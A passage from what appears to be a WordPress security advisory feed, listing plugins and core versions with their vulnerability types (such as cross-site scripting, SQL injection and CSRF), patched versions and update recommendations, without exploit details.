Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting via imgmap_save_area_title
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Symposium

Vulnerability: SQL Injection
Patched Version: 15.4
Recommended Action: Update to version 15.4, or a newer patched version

Plugin: Secure Copy Content Protection and Content Locking

Vulnerability: SQL Injection
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 13.1.5
Recommended Action: Update to version 13.1.5, or a newer patched version

Plugin: StageShow

Vulnerability: Open Redirect
Patched Version: 5.0.9
Recommended Action: Update to version 5.0.9, or a newer patched version

Plugin: WP Content Copy Protection

Vulnerability: Cross-Site Request Forgery to Setting Update
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: mTouch Quiz

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: YASR – Yet Another Star Rating Plugin for WordPress

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Out-of-the-Box

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.20.3
Recommended Action: Update to version 1.20.3, or a newer patched version

Plugin: WPML

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Bulk Edit Post Titles

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: qTranslate X Cleanup and WPML Import

Vulnerability: Missing Authorization via clean_ajx
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Core: WordPress

Vulnerability: Directory Traversal via Customizer
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: Email Before Download

Vulnerability: SQL Injection
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Sensitive Information Disclosure via Shortcode
Patched Version: 3.9.1
Recommended Action: Update to version 3.9.1, or a newer patched version

Plugin: Countdown and CountUp, WooCommerce Sales Timer

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Breeze – WordPress Cache Plugin

Vulnerability: Unprotected AJAX Actions
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Missing Authorization to Product Manipulation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Visual Website Collaboration, Feedback & Project Management – Atarim

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.4
Recommended Action: Update to version 3.9.4, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated Unrestricted File Upload
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WordPress Social Login

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 코드엠샵 마이사이트 – MSHOP MY SITE

Vulnerability: Missing Authorization via update_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Royal Elementor Addons and Templates

Vulnerability: Missing Authorization to Subscriber+ Arbitrary Post Creation
Patched Version: 1.3.56
Recommended Action: Update to version 1.3.56, or a newer patched version

Plugin: QR Redirector

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: ShiftController Employee Shift Scheduling

Vulnerability: Unauthenticated Stored Cross-Site Scripting via ‘hc-title’
Patched Version: 4.9.24
Recommended Action: Update to version 4.9.24, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Type not given in this entry (affected: wpDiscuz 7.0)
Patched Version: 7.0.5
Recommended Action: Update to version 7.0.5, or a newer patched version

Plugin: WP iCal Availability

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPCS – WordPress Currency Switcher Professional

Vulnerability: Missing Authorization to Arbitrary Custom Drop-Down Currency Switcher Deletion
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Classified Listing Pro – Classified ads & Business Directory Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.20
Recommended Action: Update to version 2.0.20, or a newer patched version

Plugin: zeenshare

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Polls

Vulnerability: IP Validation Bypass
Patched Version: 2.76.0
Recommended Action: Update to version 2.76.0, or a newer patched version

Plugin: Daily Inspiration Generator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rezgo Online Booking

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Plainview Protect Passwords

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MapPress Maps for WordPress

Vulnerability: Authenticated Map Creation/Deletion to Stored Cross-Site Scripting & Remote Code Execution
Patched Version: 2.53.9
Recommended Action: Update to version 2.53.9, or a newer patched version

Plugin: mpOperationLogs

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Donation Thermometer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 12.6.6.1
Recommended Action: Update to version 12.6.6.1, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: SQL Injection
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 3.7.34
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.34, 3.8.34, 3.9.32, 4.0.31, 4.1.31, 4.2.28, 4.3.24, 4.4.23, 4.5.22, 4.6.19, 4.7.18, 4.8.14, 4.9.15, 5.0.10, 5.1.6, 5.2.7, 5.3.4, 5.4.2

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.13.55
Recommended Action: Update to version 7.13.55, or a newer patched version

Plugin: Chameleon

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Theme per user

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Narnoo Distributor

Vulnerability: Path Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.7.3
Recommended Action: Update to version 3.2.7.3, or a newer patched version

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Google Maps CP

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Feedback Form Submission
Patched Version: 1.0.44
Recommended Action: Update to version 1.0.44, or a newer patched version

Plugin: jQuery Tagline Rotator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Button Plugin MaxButtons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 9.7.7
Recommended Action: Update to version 9.7.7, or a newer patched version

Plugin: WP Pipes

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Image Social Feed Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Dynamic Pricing and Discounts

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Ajax BootModal Login

Vulnerability: CAPTCHA Reuse
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FV Flowplayer Video Player

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 7.3.14.727
Recommended Action: Update to version 7.3.14.727, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting via browser
Patched Version: 13.1.6
Recommended Action: Update to version 13.1.6, or a newer patched version

Plugin: Feedweb

Vulnerability: SQL Injection
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: WP Private Content Plus

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 5.8
Recommended Action: Update to version 5.8, or a newer patched version

Plugin: firestats

Vulnerability: SQL Injection
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery via process_delete_product
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Integrate Google Drive

Vulnerability: Open Redirect via state
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: job-portal

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Back Button Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 12.0.5
Recommended Action: Update to version 12.0.5, or a newer patched version

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.9.9.2.9
Recommended Action: Update to version 2.9.9.2.9, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Admin+ Stored Cross-Site Scripting via breadcrumbs
Patched Version: 4.4.7
Recommended Action: Update to version 4.4.7, or a newer patched version

Plugin: User Activity Log Pro

Vulnerability: Unauthenticated Stored Cross-Site Scripting via User-Agent header
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Uncanny Automator – Easy Automation, Integration, Webhooks & Workflow Builder Plugin

Vulnerability: Cross-Site Request Forgery via update_automator_connect
Patched Version: 4.15
Recommended Action: Update to version 4.15, or a newer patched version

Plugin: wp-championship

Vulnerability: Multiple Cross-Site Request Forgery Vulnerabilities
Patched Version: 9.3
Recommended Action: Update to version 9.3, or a newer patched version

Plugin: Floating Social Bar

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Transposh WordPress Translation

Vulnerability: Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wow Countdowns – easily create any countdowns, counters and timers

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Smooth Scroll Links

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Video Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.2.11
Recommended Action: Update to version 1.2.2.11, or a newer patched version

Plugin: Elementor Addon Elements

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.12.8
Recommended Action: Update to version 1.12.8, or a newer patched version

Plugin: Better Search Replace

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: WP Mapa Politico España

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: Simple Link Directory

Vulnerability: PHP Object Injection
Patched Version: 5.7.0
Recommended Action: Update to version 5.7.0, or a newer patched version

Plugin: Word Replacer Pro

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Add Link to Facebook

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: WP Visitor Statistics (Real Time Traffic)

Vulnerability: SQL Injection
Patched Version: 5.6
Recommended Action: Update to version 5.6, or a newer patched version

Plugin: WP Video Lightbox

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.5
Recommended Action: Update to version 1.9.5, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.13
Recommended Action: Update to version 2.1.13, or a newer patched version

Plugin: WP DoNotTrack

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All in One B2B for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 4.8.7
Recommended Action: Update to version 4.8.7, or a newer patched version

Plugin: enigma-chartjs

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via chart
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WS Form LITE – Drag & Drop Contact Form Builder for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.176
Recommended Action: Update to version 1.8.176, or a newer patched version

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Staff Member Stored Cross-Site Scripting
Patched Version: 20.3.1
Recommended Action: Update to version 20.3.1, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: All Video Gallery Plugin for WordPress

Vulnerability: SQL Injection
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: Hungred Post Thumbnail

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Booster for WooCommerce

Vulnerability: Reflected Cross-Site Scripting in General Module
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: 10WebFAQ

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.17
Recommended Action: Update to version 1.0.17, or a newer patched version

Plugin: GeoDirectory – WP Business Directory Plugin and Classified Listings Directory

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.1.3
Recommended Action: Update to version 2.1.1.3, or a newer patched version

Plugin: Amazon Product in a Post Plugin

Vulnerability: SQL Injection
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: Simple Event Planner

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: YARPP – Yet Another Related Posts Plugin

Vulnerability: Yet Another Related Posts Plugin <= 5.30.2
Patched Version: 5.30.3
Recommended Action: Update to version 5.30.3, or a newer patched version

Plugin: Markdown on Save Improved

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Ship to Multiple Addresses

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.6
Recommended Action: Update to version 3.8.6, or a newer patched version

Plugin: Compact WP Audio Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.9.8
Recommended Action: Update to version 1.9.8, or a newer patched version

Plugin: WordPress REST API Authentication

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: All In One Slider

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mihdan: Public Post Preview

Vulnerability: Missing Authorization
Patched Version: 1.9.10
Recommended Action: Update to version 1.9.10, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: CSV Injection
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.7
Recommended Action: Update to version 3.3.7, or a newer patched version

Plugin: WP Editor.md – The Perfect WordPress Markdown Editor

Vulnerability: Cross-Site Scripting
Patched Version: 10.0.4
Recommended Action: Update to version 10.0.4, or a newer patched version

Plugin: Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ARI Stream Quiz – WordPress Quizzes Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.27
Recommended Action: Update to version 1.2.27, or a newer patched version

Plugin: Coupon Affiliates – Affiliate Plugin for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.11.0.2
Recommended Action: Update to version 4.11.0.2, or a newer patched version

Plugin: Flo Forms – Easy Drag & Drop Form Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.41
Recommended Action: Update to version 1.0.41, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Amelia < 1.0.47
Patched Version: 1.0.47
Recommended Action: Update to version 1.0.47, or a newer patched version

Plugin: Comment Engine Pro

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Thumbnail carousel slider

Vulnerability: Cross-Site Request Forgery to Mass Slider Deletion
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: About Rentals

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: Information Disclosure via Arbitrary File Read
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: QR Code Tag

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPCS – WordPress Currency Switcher Professional

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: CampTix Event Ticketing

Vulnerability: Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: WooCommerce Dropshipping Premium

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: WP Open Social

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: gSlideShow

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BCS BatchLine Book Importer

Vulnerability: Arbitrary Product Import/Update
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Menubar

Vulnerability: Cross-Site Request Forgery in wpm-admin.php
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: flog

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wordable – Export Google Docs to WordPress

Vulnerability: Authentication Bypass
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Split Test For Elementor

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Autoptimize

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.8.9
Recommended Action: Update to version 2.8.9, or a newer patched version

Plugin: Microsoft Advertising Universal Event Tracking (UET)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Rara One Click Demo Import

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: SpeakOut! Email Petitions

Vulnerability: Cross-Site Scripting
Patched Version: 2.13.3
Recommended Action: Update to version 2.13.3, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: GigPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.11
Recommended Action: Update to version 2.3.11, or a newer patched version

Plugin: bib2html

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.7
Recommended Action: Update to one of the following versions, or a newer patched version: 1.8.7, 1.9.10, 2.0.5, 2.1.11, 2.2.9, 2.3.7

Plugin: WP Accurate Form Data

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: SQL Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: About Me 3000 widget

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Multiple Protection Mechanism Bypasses
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Terillion Reviews

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Buzzsprout Podcasting

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 4.6.15
Recommended Action: Update to version 4.6.15, or a newer patched version

Plugin: Quick Page/Post Redirect Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Simple Mobile URL Redirect

Vulnerability: Cross-Site Request Forgery leading to Mobile Redirect Updates
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Cross-Site Request Forgery via qc_wp_latest_update_check
Patched Version: 4.7.9
Recommended Action: Update to version 4.7.9, or a newer patched version

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: Arbitrary File Upload
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Awesome Filterable Portfolio

Vulnerability: Blind SQL Injection
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: HT Mega – Absolute Addons For Elementor

Vulnerability: Absolute Addons for Elementor Page Builder <= 1.5.5
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: Users To CSV

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Media File Renamer: Rename for better SEO (AI-Powered)

Vulnerability: Missing Authorization Checks
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary File Deletion
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: WP Social Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.4
